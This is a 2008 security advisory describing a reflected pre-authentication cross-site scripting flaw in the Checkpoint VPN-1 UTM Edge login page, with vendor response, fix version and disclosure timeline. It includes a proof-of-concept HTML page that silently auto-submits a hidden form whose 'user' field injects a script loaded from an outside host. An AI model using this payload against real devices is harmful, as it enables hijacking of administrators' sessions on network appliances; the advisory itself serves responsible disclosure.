checkpoint_080306.txt

` Louhi Networks  
Security Advisory  
  
  
Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting  
Release Date: 2008/03/06  
Last Modified: 2008/03/06  
Authors: Henri Lindberg, Associate of (ISC)²  
[[email protected]]  
  
Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x  
(patched in version 7.5.48)  
Devices: Checkpoint VPN-1 UTM Edge  
Attack type: Cross site scripting (non-persistent)  
Risk: Low  
Vendor Status: Vendor has released an updated version  
References: http://www.louhi.fi/advisory/checkpoint_080306.txt  
  
  
Overview:  
  
Quote from http://www.checkpoint.com/  
"VPN-1 UTM Edge appliances deliver unified threat management to  
enterprises with branch offices and simplify security deployments  
and manageability. VPN-1 UTM Edge appliances consolidate proven  
enterprise-class technology into a single branch office solution  
that does not compromise the corporate network and eliminates the  
branch office as your weakest link. As part of Check Point's Unified  
Security Architecture, VPN-1 UTM Edge can enforce a global security  
policy and allows administrators to manage and update thousands of  
appliances as easily as managing one."  
  
Insufficient input validation and output encoding on the login page  
allows attacker to perform html-injection by posting suitable string  
to the login form handler. The injection leads to reflected  
pre-authentication cross site scripting.  
  
  
Details:  
Form based authentication is used only when device is accessed using  
HTTP. Authentication over HTTPS uses HTTP basic authentication.  
  
The device does not accept the parameters in a GET request, POST  
request has to be used instead - exploiting the XSS vulnerability  
requires therefore a bit more effort compared to ordinary GET based  
reflected cross site scripting vulnerability.  
  
The current version can be checked from  
http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP  
address of the device. The page also displays current product key.  
  
Vendor response:  
  
"Once users register the appliance and connect to the service center  
(Safe@Office appliances), the latest firmware is automatically  
downloaded to their appliance. For UTM-1 Edge appliances, the latest  
firmware version can be downloaded from the Check Point download  
center. Currently, this is version 7.5.48 that does not contain the  
reported issue. We believe that customers are not exposed to this  
issue."  
  
Proof of Concept:  
  
<html>  
<body onload="document.f.submit()">  
<form name="f" method="post" action="http://192.168.10.1"  
style="display:none">  
  
<input name="user" value="'<script/src=//l7.fi></script>">  
  
</form>  
</body>  
</html>  
  
  
  
Solution:  
  
Update to version 7.5.48  
  
  
Disclosure Timeline:  
  
19. February 2008 - Contacted Checkpoint by email  
20. February 2008 - Vendor response.  
6. March 2008 - Advisory was released  
  
Copyright 2008 Louhi Networks Oy. All rights reserved.  
`